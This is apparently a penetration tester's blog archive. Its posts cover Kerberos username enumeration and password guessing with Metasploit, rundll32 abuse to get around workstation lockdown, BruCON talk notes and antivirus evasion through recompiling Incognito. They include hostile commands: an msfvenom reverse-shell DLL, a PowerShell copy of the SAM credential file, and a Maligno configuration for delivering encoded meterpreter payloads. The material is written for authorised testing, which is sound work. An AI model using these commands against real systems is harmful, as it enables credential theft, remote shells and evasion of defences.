Jun 26

Kerberos Username Enumeration – Top 500 Common Usernames

Kerberos Username Enumeration – Username Wordlists

I’ve been having a fair bit of joy with the auxiliary/gather/kerberos_enumusers metasploit module on internal engagements, however you do need to provide the module with a good quality username wordlist or wordlists.

On a recent engagement, using only the top 50 male and female userlists, I was able to guess 70 domain accounts from a possible 400, and of course several of them were found to be configured with the obligatory easily guessed password.

Most domains I see tend to leverage some form of firstname, surname combination for domain user usernames. For example:

[Firstname].[surname] e.g: JACK.SMITH

[Firstname, First Letter].[Surname] e.g. J.SMITH

To that end I have created some username lists that are likely to identify valid usernames when targeting large Windows domains. The lists are compiled from the top 500 most common firstname and surname as per the United Kingdom’s Office for National Statistics (ONS).

Initially, you will want to run a tool such as Responder which will help you determine the format for usernames within the target environment e.g. L.FOWLER or LIAM.FOWLER. Indeed, I typically conduct this username enumeration exercise whilst Responder is running in the background.

Once the format has been identified and assuming the format is used universally throughout the domain, Kerberos username enumeration can begin.

The username lists I have created can be seen in the table below. I have also included the raw firstnames and surnames lists should you need to create a custom format:

Username ListWord CountFile SizeExample
Top 500 Female Firstnames5004KAMELIA
Top 500 Male First Names5004KJACK
Top 500 Surnames5004KSMITH
Top 50 Female Firstnames.Surnames25000330KAMELIA.SMITH
Top 50 Male Firstnames.Surnames31000400KJACK.SMITH
A-Z.Surnames13000116KA.SMITH to Z.LEONARD
C.Surnames etc.5005KC.SMITH

Note: All of the username wordlists (A.Surname through to Z.Surname) can be downloaded from: https://github.com/attackdebris/kerberos_enum_userlists


Attack Walkthrough

I’ll now walk through the complete attack process:

Initially we configure msf module auxiliary/gather/kerberos_enumusers with our wordlist:

We subsequently run the module. We’re obviously going to have a lot of failures but with no account lockout to worry about it doesn’t matter:

Running “creds” displays all of the successfully enumerated usernames:

The final stage is to leverage the auxiliary/scanner/smb/smb_login msf module to determine if any of our identified accounts are configured with weak passwords:

Obviously, the domain’s account lockout policy should be taken into consideration when attempting to guess passwords. A sensible approach is to attempt a single password at a time, restricting yourself to 2 guesses (system set to lockout after 3 invalid attempts) or 4 guesses (system set to lockout after 5 invalid attempts) against a single account every 30-minutes. 30 minutes is a typical “lockout observation window“.

Handily the auxiliary/scanner/smb/smb_login msf module’s “ABORT_ON_LOCKOUT” option will prevent too much damage being done, as long as it is enabled.

Jun 23

Auto-sslscan (Automatic SSL Scanning)


As I mentioned in the previous post whilst Nessus and Nmap do a reasonable job of enumerating SSL protocols and ciphers I often find myself utilising other 3rd party SSL scanning tools. One I find myself turning to on a regular basis is sslscan, I like the output it provides and issues become immediately apparent, although if you prefer using SSL scanning tool X or Y, the auto-sslscan code can be easily amended to cater for your tool of choice.

Auto-sslscan is a python script designed to automate the process of conducting ssl scanning via sslcan. The Auto-sslscan script parses an nmap.xml output file, extracts all SSL services and automatically performs an sslscan of them.

Step 1 – Create a valid nmap .xml file:

Note: Some form of Nmap version scanning must be utilised to create the XML ouput i.e. -sV or -A (In order to determine whether the service is SSL enabled)

Step 2 – Process the Nmap XML file with auto-sslscan.py:

SSL Services:

That’s effectively job done, we now have a list of SSL services if we wish to target them again with another tool:

SSL Scan Ouput:

The actual SSL scanning “sslscan” ouput is saved to a concatenated file (truncated image below):

The code and installation instructions can be found here: https://github.com/attackdebris/auto-sslscan

Also check out nmap-ssl-parser, which simply parses the nmap XML file and provides a list of SSL services: https://github.com/attackdebris/nmap-ssl-parser

Credit  – The base code I used to create nmap-ssl-parser: https://github.com/DanMcInerney/nmap-parser/blob/master/nmap-parser.py

Jun 23



Nessus and Nmap both do a decent job of enumerating supported SSL protocols and ciphers from remote servers. However, I usually find myself also utilising other 3rd party SSL scanning tools. To that end I wanted an easy way to quickly parse out SSL services to an output file for input into other tools.

Nmap-ssl-parser is a python script designed to query nmap XML output and provide a list of usable ssl services in the format host:port

The nmap-ssl-parser script parses an nmap.xml output file, extracts all SSL services and writes them to a filename of your choice.

Step 1 – Create a valid nmap .xml file:

Note: Some form of Nmap version scanning must be utilised to create the XML ouput i.e. -sV or -A (In order to determine whether the service is SSL enabled)

Step 2 – Parse the nmap .xml file with nmap-ssl-parser.py:

That’s effectively job done, as can be seen below our output file “my_output_file.txt” contains our host:port formatted list ready for importing into any other tool of choice:

The code and installation instructions can be found here: https://github.com/attackdebris/nmap-ssl-parser

Also check out auto-sslscan, which takes this process a step further by automating sslscans from the parsed list of SSL services: https://github.com/attackdebris/auto-sslscan

Credit  – The base code I used to create nmap-ssl-parser: https://github.com/DanMcInerney/nmap-parser/blob/master/nmap-parser.py

Nov 09

Kerberos Domain Username Enumeration

Kerberos Domain Username Enumeration

Over recent years enumerating valid operating system level user names from up-to-date and well-maintained Windows environments, even from an internal test perspective, has become increasingly unlikely. Where RID cycling once provided us with a full list of domain users from an unauthenticated perspective, this is generally no longer the case.

However, in relation to internal assessments the Kerberos service (88/tcp) still provides us with a happy hunting ground in relation to the ability to enumerate domain account names.

Essentially the username enumeration is leveraged via the following Kerberos error codes:

User Status Kerberos Error
Present / Enabled KDC_ERR_PREAUTH_REQUIRED – Additional pre-authentication required
Locked / Disabled KDC_ERR_CLIENT_REVOKED – Clients credentials have been revoked
Does not exist KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database


Several good tools, which have been around for some time, have provided us with the ability to leverage these Kerberos responses to identify valid or invalid domain accounts.

Both of the tools I have been leveraging up until now have both been provided by Patrik Karlsson, the first is the standalone Java tool Krbguess, the second being the krb5-enum-users NSE script for nmap.




Java –jar kerbguess.jar –r [domain] –d [user list] –s [DC IP]



Nmap krb5-enum-users NSE Script


Nmap –p 88 –script-args krb5-enum-users.realm=’[domain]’,userdb=[user list] [DC IP]



Metasploit Module: auxiliary/gather/kerberos_enumusers

Like most penetration testers I’m a heavy user of the Metasploit Framework and for years have thought I would like to be able to leverage this functionality from within the framework. For whatever reason it never seems to have been implemented, thus I decided to have a go at implementing it.

Leaning heavily on the Kerberos support provided by other Metasploit contributors and using the auxiliary module for ms14_068_kerberos_checksum as a template the process was actually a lot simpler than I had anticipated.

The new Metasploit auxiliary module can be found in the following location:



As with the previously discussed Kerberos enumeration tools, 3 values need to be provided:

  1. Domain Name (DOMAIN)
  2. Domain Controller IP (RHOST)
  3. User list (USER_FILE)


The module can now be run to enumerate valid (and disabled/locked) domain accounts via the Kerberos service:


Finally, and thanks to an addition by bwatter-r7 at rapid7, any valid enumerated usernames are stored in the Metasploit database and can be retrieved via the ‘creds’ command:






Oct 14

Babel Scripting Framework (babel-sf)

The Babel Scripting Framework (babel-sf) is a collection of custom scripts to facilitate useful pentest related functions via scripting languages.

All of the following tools are replicated in the following languages – PowerShell, Perl, Ruby and Python:

  1. Portscanner
  2. ARPscanner
  3. FTP Client
  4. WGET Client
  5. Bind Metasploit Payload
  6. Reverse Metasploit Payload

Why a custom scripting framework?

babel-sf has been created for testing minimal installations, locked down and/or hardened environments e.g.

  1. When the target Operating System has a minimal installation
  2. When the Operating System’s native tools have been removed
  3. When the Operating System’s native tools have been locked down via ACLs, Group Policy or AppLocker

But crucially, you still have access to one or more scripting languages e.g. Python

Its development was also partially driven by my own needs:

  1. Proof of Concept i.e. to demonstrate why access to scripting languages can be bad!
  2. System Administrator “Yeah, users have access to [ruby/perl/python/PowerShell], so what?”

But really Why?

To solve reoccurring problems encountered during my testing:

  1. Having to write your own code to perform a required task (takes time!)
  2. Having to Google for code to (re)use, tweak and/or just to get working (takes time!)

I expect  babel-sf to be used when you don’t have any tools or Operating System utilities available e.g.

  1. No telnet
  2. No FTP
  3. No wget
  4. No SSH
  5. No netcat, nmap etc. etc.

In this scenario you simply download babel-sf  onto the target box via a short one liner (in whichever scripting language is available to you).


babel-sf “aspires” to be identical in each scripting language:

  1. Identical Usage (switches etc.)
  2. Identical Output
  3. Offer an identical ‘Look and Feel’


As it stands, babel-sf provides scripts for the following functions:

1. Portscanner (see examples below)

2. Arpscanner (see examples below):

So you get the idea, replicated tools in multiple scripting languages…From now on I’ll just show one example screenshot per utility (but they are all there!)

3. FTP client (crude)
ruby (example):

4. WGET client
perl (example):

5. HTTP Server
PowerShell (example):

6. Bind Metasploit Payload
python (example):

7. Reverse Metasploit Payload
ruby (example):

Initial Download?

Assuming that at least one scripting language is supported on the target system, an initial single line script (which provides wget type functionality) will be run to download babel-sf to the target host.

In practice to download babel-sf to our target system we run the relevant script, for our available programming language.  This will have to be typed in manually (but thankfully these scripts short and succinct).


Create ‘download.pl’ containing the following code and execute via: ‘perl download.pl’

use LWP::Simple; mirror('https://github.com/attackdebris/babel-sf/archive/master.zip', 'babel-sf.zip');


Create ‘download.py’ containing the following code and execture via: ‘python download.py’

import urllib; urllib.urlretrieve('https://github.com/attackdebris/babel-sf/archive/master.zip', 'babel-sf.zip')


Create ‘download.rb’ containing the following code and execture via: ‘ruby download.rb’

require 'open-uri'; File.open("babel-sf.zip", "wb").write(open("https://github.com/attackdebris/babel-sf/archive/master.zip", "rb").read)


Create ‘download.ps1’ containing the following code and execture via: ‘powershell .\download.ps1’

(new-object System.Net.WebClient).Downloadfile("https://github.com/attackdebris/babel-sf/archive/master.zip","babel-sf.zip")

Obviously, if you were located on a closed network you would download from your own host, rather than from github.

Script Uniformity?

The scripts offer uniform functionality to a point, some exceptions are:

Ruby has a socket limit (approx 1024):  This limits the maximum number of ports that can be scanned at once

I had to be flexible with the type of metasploit shells included:  Whilst, bind and reverse shells are included for each scripting language, one language may provide tcp_shells whlilst another may provide meterpreter shells

Whilst the underlying functionality is similar for all of the different HTTP servers: It proved tricky getting HTTP servers to provide a uniform look/feel:

Arpscanner usage varies a little between languages: The interface switch (e.g. eth0) is not currently supported in all languages


  1. I’m not a coder (if you are a coder, look away now!)
  2. Coding in 4 different languages at the same time is foolhardy!
  3. Bugs / Errors abound
  4. If you don’t like certain aspects, contribute! Make them better!


  1. Only limited testing has been conducted
  2. Further testing, testing, testing is required e.g. What versions of Perl, Python, Ruby and PowerShell do the scripts run on?

babel-sf has been tested on the following target Operating Systems:

Perl, Python and Ruby (Currently only targeting Nix systems)

  1. Ubuntu 12.04
  2. Debian “wheezy”

PowerShell (Windows)

  1. Created on and tested in PowerShell version 2.0 (Windows 7)

Future Additions?

Addition of further scripting languages:

  1. PHP
  2. VBScript
  3. Java
  4. More?

Github – https://github.com/attackdebris/babel-sf/
Blog – https://www.attackdebris.com/?p=182

Babel-sf is not wholly new code by any means; large snipets, small snipets and great ideas have been borrowed from many other open source repositories (hopefully, I’ve remembered to reference them all!):

Coding for penetration testers (Syngress Press)

Feb 11

rundll32 lockdown testing goodness

I was recently on a Windows 7 workstation lock-down test which had been implemented pretty effectively with the vast majority of file and folder, service and AppLocker applied rules and permissions preventing the majority of malicious actions.

However, I found that I was able to utilise rundll32.exe to attempt to enumerate/manipulate the environment.  I couldn’t really find a good pentest related resource for leveraging rundll32 so thought I’d a put something together to highlight what I’d found to be useful.

All of the following commands have been tested on Windows 7 Ultimate, buts it’s worth bearing in mind that even if the command runs successfully you’ll still be restricted to the security context of the current user (but at least you’ll have a way of initiating the command / function that you may not have had before).

I’ve also refrained from referencing any Control Panel (.cpl) related commands, as these can all be trivially called from C:\Windows\System32 (and most weren’t executable during my engagement).

Note: The usage screenshots have been run from the command line for the sake of clarity, in reality you’re unlikely to have cmd.exe (or PowerShell) access and the rundll32 commands (and arguments) will need to be called via Windows shortcuts (as described towards the end of this post).

Main Commands:
rundll32 Shell32.dll,SHHelpShortcuts_RunDLL Connect – Map Network Drives
rundll32.exe shell32.dll,Control_RunDLL – Control Panel
rundll32.exe devmgr.dll DeviceManager_Execute – Device Manager (view only)
rundll32.exe shell32.dll,Options_RunDLL 1 – Taskbar Options
rundll32.exe shell32.dll,Options_RunDLL 2 – Search Options
rundll32.exe shell32.dll,Options_RunDLL 3 – Start Menu Options
rundll32.exe shell32.dll,Options_RunDLL 4 – Turn System icons on/off
rundll32.exe shell32.dll,Options_RunDLL 5 – Taskbar Notifications on/off
rundll32.exe shell32.dll,Options_RunDLL 6 – Taskbar Toolbar Display Options
rundll32.exe shell32.dll,Options_RunDLL 7 – View File and Folder Options (see below)

rundll32.exe keymgr.dll, KRShowKeyMgr – Stored Usernames/Passwords (see below)

rundll32 Shell32.dll,OpenAs_RunDLL file.abc – Change file associations (e.g. ext .abc)

rundll32.exe van.dll,RunVAN – Network Popup (Subsequently access networking?)
rundll32.exe shwebsvc.dll,AddNetPlaceRunDll – Add network location (wizard)
rundll32.exe oobefldr.dll,ShowWelcomeCenter – Start Welcome Centre
rundll32.exe dsquery,OpenQueryWindow – Find Users (New targets to brute force?)

More Intrusive Commands:
rundll32.exe powrprof.dll,SetSuspendState – Hibernate
RunDll32.exe user32.dll,LockWorkStation – Lock Screen

Utilise a Third Party .DLL?

Didier Steven’s has produced a nice write up on taking a third party command interpreter and converting it from .exe to .dll, for more information see: Didier’s Blog

If we’re able to upload our new .dll to our target system we may be able to leverage a command prompt via rundll32.exe, the steps to do this are as follows:

1. Upload Didier Steven’s cmd.dll to your target system.
2. Create a new shortcut (on your desktop for example):
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\cmd.dll,Control_RunDLL
3. Double click your new shortcut to pop your command shell

Metasploit Reverse Shell?

Another option to abuse rundll32 maybe to upload a Metasploit derived .dll, the steps to do this are as follows:

1. Create our reverse_shell .dll file:
msfvenom -p windows/meterpreter/reverse_tcp -f dll LHOST= LPORT=12345 > ./pentest.dll

2. Upload the reverse_shell payload .dll file to our target system e.g. HTTP

3. Start our reverse listener on our pentest host via Metasploit’s: /exploit/multi/handler

4. Trigger the .dll via the same method used with cmd.dll (above), i.e. via a shortcut:
C:\Windows\System32\rundll32.exe c:\users\test123\desktop\pentest.dll,Control_RunDLL
We now have a full meterpreter session in the context of our standard user, but we’re now able to initiate privilege escalation etc. via the Metasploit framework 🙂

By way of further reading; JavaScript can also be called through rundll32.exe, checkout the following post:


Oct 01

BruCON 2013 – Highlights

The fifth BruCON conference was held 26th to 27th of September 2013 in Ghent, Belgium.  From the off, the conference had a great feel, its organised by a group of security enthusiasts as a non-profit organisation and they do a great job.  From the live classical piano playing in the lounge/rest area where you have you  meals; breakfast, lunch and dinner (which are all included in the low price) to the large screen displaying all the recent #BruCON twitter activity it makes for an enjoyable couple of days.  The conference was organised into a single (main auditorium) speaker track and 2 hands-on lab tracks in the afternoon.  Whilst you’re wholly free to mix and match between the main track and the lab tracks, I focused on the main speaker track (although I did hear that the labs were also excellent!), my vague recollections and highlights can be found below.

HTTP Time bandit – Vaagn Toukharian

The tool is basically a tool to perform resource usage denial of service (DOS) type attacks against layer 7 or as referred to during the talk “HTTP GET flooding with spice”. In essence the tool performs a GET flood but some analysis is done before flooding takes place.

The tool first conducts a spider of the site to determine and collect the transfer times for each resource, the average speed of transfers are calculated. Once complete the resource(s) That have the slowest average transfer time(s) are calculated; effectively CPU intensive resources take longer to respond and this is what we are identifying here. To remove false positives from the returned data set statistics are used to analyse the data and discard resources that have a large degree of variance i.e. non consistent time delays that have another cause e.g. network latency.

The tool is available on the GitHub link: https://github.com/Qualys/timeBandit

The speakers moved on to discuss traditional DDOS defences in the form of load balancing and commercial protection services e.g. cloud based solutions, identifying and fixing resource hogs, apache configuration options and other apache modules advanced mod_security protection

The speakers suggested that Timebandit can be used itself to identify and fix these resource hogs. And went on to state that in an ideal world the tool itself would generate configuration files to protect the system (stating this was unlikely to happen).

The following Apache modification options were discussed:

  1. mod_security – offers simple protections that reduced an unprotected attack (i.e. without the change) with a CPU threshold of 98% down to a CPU load of 0% (with the change applied)
  2. mod_limitpconn – limits the number of downloads
  3. mod_qos – provides resource management options
  4. mod_bwshare – accepts or rejects connections based on previous transactions with a source IP address
  5. mod_evasive – DOS/DDOS protection measures
  6. mod_httpbl – Makes use of project honeypot to gather a list of violators for the blacklist (it was suggested this was good in theory but hadn’t been examined in detail)

Taking the BDSM out of PCI with Open Source – Erin Jacobs and Zack Fasel

As most people who deal with it are only too painfully aware PCI DSS represents the Payment Card Industries, Data Security Standard.

  • PCI compliance comprises of levels 1-4.
  • Companies attempt to outsource the problem
  • Open Source Solutions can be used for everything except external vulnerability scans.
  • No clear PCI configuration guidelines, very generalised

The speakers have started the “Open PCI project.com”. With the aim to provide open source guidelines which are scalable, contain specific walk throughs and simple deployments via ready-to-go installations / virtual machines.

Although there are 12 PCI issues, the talk was only concerned about those that people are getting wrong, these issues in priority were:

  • Logging: either not doing it well or spending too much money on it. Splunk whilst an excellent resource is too expensive. How about an open source option?

Linux = traditional options have been: syslog or deploying an agent.
Windows = Deploying an agent (most likely option) or integration with HIDS.

  • Log server storage options were discussed “fluentd” was posed as a possible open source option to Splunk.
  • File Integrity Monitoring: several options were discussed with the best suggested being OSSEC.
  • Patch Management: it was stated that this probably the hardest thing to address with open source, but chef / puppet were suggested by a member of the audience as possible options.
  • 2 factor authentication: OAUTH a hardware and software solution.
  • AV – anomaly or ClamAV based or potentially binary white-listing.

CobraDroid – Jake Valletta

CobraDroid is a full-featured Android sandbox that includes the ability to modify device and radio identifiers, proxy network traffic with SSL validation bypassing, and perform per application method hooking, alerting, and packet capturing (and more!).

AppUse was discussed a closed source dynamic analysis tool.

CobraDroid setup:
Setup Android SDK, Download archives from his site, create new AVD (may have missed a stage here, see slides for full details).

CobraDroid runs Android 2.3, provides both Bash and Busybox which offers a much more user friendly testing environment.

CobraDroid Functionality:

The tools SSL validation bypass allows you to man in the middle SSL connections!

Application specific packet capture, uses custom iptables rules, resultant pcap files can be viewed wire shark.

Uses method hooking to alert on method calls – configured via the file /etc/hooks.conf

Project website: http://thecobraden.com/projects/cobradroid/

Real Time Analysis and Visualisation of Internet Status – Tiago Balgan Henriques, Tiago Martins, Joao Gouveia

Events are processed and analysed, as they happen, without storing large data volumes, enabling live actionable intelligence and rapid response capabilities for threat analysts and decision makers who want to stay ahead of emerging threats and opportunities or in other words “events, lots and lots of events”.

The huge amount and variety of data to tackle is difficult, a common API?

The speaker team have created a high performance scalable Complex Event Processor (CEP), uses streaming technology, follows publisher/subscriber model. Events are all handled in JSON format.

“StreamForce” = CEP
Search forms are entered and used to query the API
Real time feed services from multiple sources i.e. Honeypots, DNS, mail protection products.

Once the form is submitted It is possible to display a geographic maps showing botnet activity, Zeus activity etc. For example it would be possible to show the biggest botnets in any specific country.

Lightening Talks – Day 1

OWASP JAWS – Purpose: The purpose of the project is to have a workset with runnable java code that shows secure coding practices in a working way. Too many times developers end up at some developer forum where someone asks a question and the solutions (that may be working but not necessarily in a secure way) are copied and end up in production code:


DNS Amplification Attacks – Lucas Kauffman some very good slides that should be read in their entirety:


The curious case of – Speaker was trying to determine why one host was always resolving Google.com to a non Google related IP address in China i.e. It turned out that DNS responses were being resolved to IPV6 addresses but interpreted as IPV4 addresses by affected hosts i.e. decoded and always resolving to i.e this address hosted in China.

HTTP2.0 (Speedy) – Google’s implementation accepted as the new standard – makes use of header compression both client and server side. Not pull and request as old implementations but multiple simultaneous conversations – Burp doesn’t work with it! It’s all SSL, Web over UDP as well as TCP.

Day 2

Paint by numbers vs Monet – Russ Gideon

Analysis of APT attacks has shown that an MSF module has been seen in APT attacks 7 of 22 in the CVE PDF exploit discussed, the only change from the default MSF module was that the shellcode changed and obfuscation was added but it was the same basic code in use on the whole.

Once access has been gained: long term back doors established, credential harvesting, lateral movement, mimikatz (can be their own version), PTH toolkit, their own psexec.exe. Dropper installs a service. Remote named pipes for all communications.

The speakers have created a custom psexec module (on GitHub), to hide from forensics, AV etc.

Discussed a black hat group: installed 3 x back doors on each host, used UPX for packing (i.e. old/lame) and self extracting RAR file, they attacked sticky keys (sethc) and magnify for privilege escalation. SYSTEM$ user added and the user was also added to the local admins group, password identified was “qazwsx!#123”

In conclusion they summarised that APT attacks were not highly sophisticated, the groups behind the attacks do not think like pentesters, they think forensically and opportunistically.
Conclusion: pentesters usually have a much different footprint and end goals than those of APT operators / Nation States.

Data Plane Networking – Robert Graham

Apache/Bind should not be exposed to the Internet they were designed for the Internet that existed in the late 90’s and are not robust/ruggedised enough for today’s Internet (I paraphrase here). The speaker suggested using an exokernel i.e every event has its own thread and a virtual network adapter. A more short term solution is to make use of Nginx (as opposed to Apache) and other DNS servers (as opposed to Bind) faster.

Building Custom Android Malware for Pen Testing – Stephan Chenette

Android uses the Dalvik Virtual Machine. Malware defined as anything that breaks the security model without the users knowledge.

Once installed malware will probe for emulator or physical device (won’t trigger if emulator is detected as an end user would not be running an emulator), what type of network connection: wifi,3G etc.

Malware actions i.e. what are they trying to achieve: to make use of premium services that the user is charged for (not until their next bill) or advertising i.e. the client is used as an SMS bot sending texts to a wider user community.

One infection discussed was simply installing a valid application (no Trojan), but the app contains a vulnerability that is exploited only when the victim connects to attackers website.

The majority of malware today is found on 3rd party stores, although some is also found on the Google store.

Summary: Apps can do almost anything; the speaker suggests the fix is not restricting this functionality but in comprehensively reviewing applications’ behaviour and ensuring they conform to their specified security model.

Geolocation of GSM devices – David Perez and Jose Pico

This talk focused on the Geolocaton of GSM (I.e. 2G devices) when there is no access to the phone network. The only thing known about the handset was the IMEI (i.e. the unique device) and IMSI (i.e the unique SIM) and rough location of the device. The scope was to produce a car based/portable solution.

The equipment utilised by the team was a portable fake GSM Base station (USRP1), Omni-directional and directional antennas (to pinpoint the exact location), Software the team used was in the form of Open Base Transceiver Station (OpenBST). All of the equipment needed to provide GPS data, triangulation and a user console.

Initially the team focused on distance estimation based on power measurements, this method failed and was soon discarded.

Time based triangulation could only locate devices plus or minus 500 meters, this was initially deemed to be a fail as it was not accurate enough (the inaccuracy was due to a delay introduced that was dependant on phone make/model/vendor).

This testing is illegal in most countries, however the team stated all testing was conducted in a country where it was legal….

The team did find a solution to the device introduced delays, but whilst results were much better after this problem had been solved, results were still not good enough.

The next issue was that when the team were impersonating the real network, no devices would register with the fake cell (phones didn’t see it), if tests were repeated with commercial BTS they did register why?

Power related issue? No
Beacons wrong? No, they were different between the fake and real cells initially but even after this had been fixed the issue still existed.

No precision of the clock (needs to be very precise) turned out frequency was too high by 900hz (the standard only allows for 45hz deviation) Fixed? Not entirely, devices did finally register to the fake cell but it still wasn’t working properly > the team bought a better clock > this finally solved the issue!

Once registered to the fake cell phones stayed registered for 1.8Km; within the range of the phone. Max distance device registered 15 meters, not enough power….could not beat the power of the real base station. You win this race by manipulating Cell Re-selection Offset (CRO); which is used for roaming between cells.

The final solution involved getting close to target and switching to directional antenna.

Here it was thought that the more power you receive from the target, you are pointing at target? This assumption was wrong, power fluctuated even when antenna was stable; the cause was BTS telling the target device to lower or raise it’s power….this was happening!

Fix = Disabled this mechanism in the OpenBST source code but only once the kit was close enough to move into directional mode…then the team finally had a WIN : )

With this final solution the team were able to pinpoint devices down to 20 metres (in an open field environment), these figures were not quite as good in an urban environment.

With this problem finally solved (after several months of work), the team stated their future work would be to attempt a solution for achieving the same for 3G networks. Whilst the team are limited by the fact that no open source 3G base station implementation exists they are optimistic that it is possible with 3G.

Aug 15

Old Incognito binary not working? or being eaten by AV? Then make your own

The original incarnation of Incognito has been around for a while it’s now a little dated and also picked up by the vast majority of Anti-Virus vendors.

With this in mind I was intrigued by post by Josh Stone who has done a nice write up on creating an Incognito binary via the Metasploit Framework source code (and one small addition):


Quick Start:

Download the following files from the meterpreter GitHub repository or from a local metasploit framework install:

list_tokens.h, list_tokens.c, token_info.c, token_info.h, incognito.h

and download main.c from Josh’s site.

Then compile yourself up a new version making some subtle changes to original source code and it’s unlikely your shiny new tool with ever get picked up by AV:

gcc -o Incognito.exe main.c list_tokens.c token_info.c 

It’s also worth mentioning that MWR Labs have updated Incognito to version 2.0 (with source code available) so this is also worth a look.



Aug 15

NinjaCopy – Read Any File On Any System

Want to read any file on any box?*

*Powershell and Admin account required

Take a look at:


This script is ideal for dropping local SAM files off compromised hosts or dropping the NTDS.dit file off domain controllers.

Basic usage:

PS > .\Invoke-NinjaCopy.ps1 -Path “C:\Windows\System32\config\sam” -LocalDestination “c:\copy_of_local_sam”

Download here:


May 30

Maligno (Metasploit Payload Server) – Hands On

I stumbled across Maligno on SecurityTube there’s a good video:


Maligno is an open source penetration testing tool that from Encripto (www.encripto.no) that serves Metasploit payloads.

The only negative I can see with it are that Python needs to be installed on the victim along with Pycrypto (which may be present on *nix targets but is not part of Python 2.7 for Windows).

Maligno is available for download here:


What is it? [From the Maligno README]

It generates shellcode with msfvenom and transmits it over HTTP or HTTPS.

The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Maligno comes with a client tool, which is a modified version of David Kennedy’s PyInjector. Such modified client implements HTTP, HTTPS and encryption capabilities.

The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine.

As a result, you should get your Metasploit session while avoiding detection.

Hands On

My Lab setup:



First Use:

You must create an SSL certificate in order to set up Maligno with HTTPS.

certgen.sh will do the job for you.



Make the appropriate changes to server.conf:


msfpath = /opt/metasploit/app/

msfpayload = windows/meterpreter/reverse_https, windows/meterpreter/reverse_tcp, windows/meterpreter/reverse_http

msflhost =

msflport = 4444

msfencoder = x86/shikata_ga_nai

msfiterations = 10

msfcache = true

msfcachefile = msfcache


base64rounds = 1

blocksize = 32

paddingchar = !

secret = cedbd5af520bdab20c3b79d521d8b1c8


scope =


srvport = 443

ssl = true

sslcert = ./certs/server.pem

banner = Microsoft-IIS/7.5

reqparam = id

Upload maligno_client.py and make appropriate changes to maligno_client.py i.e.:

# IP address and port where Maligno server is waiting for connections

server_addr = “”

server_port = “443”

Starting Maligno Server:

# ./maligno_srv.py


| Maligno v0.6: A Metasploit payload server |

| by Juan J. Guelfo, Encripto AS (post@encripto.no) |


[*] Starting Maligno…

[*] Reading server configuration…

[*] SSL certificate file found. SSL enabled…

[*] Maligno is up and running. Press CTRL+C to stop…

Maligno Client Dependencies:

Python (Tested with 2.7 on Windows XP)


pycrypto (http://www.voidspace.org.uk/python/modules.shtml#pycrypto)

Tested with http://www.voidspace.org.uk/downloads/pycrypto26/pycrypto-2.6.win32-py2.7.exe

Running Maligno Server:

CTRL-C Maligno server as soon as…

[+] Package sent!

[*] End of request

…is received.

Victim (Maligno Client):

Meterpreter session doesn’t seem to start until you CTRL-C the Maligno Server (which has done it’s job anyway!)


: )

Older posts «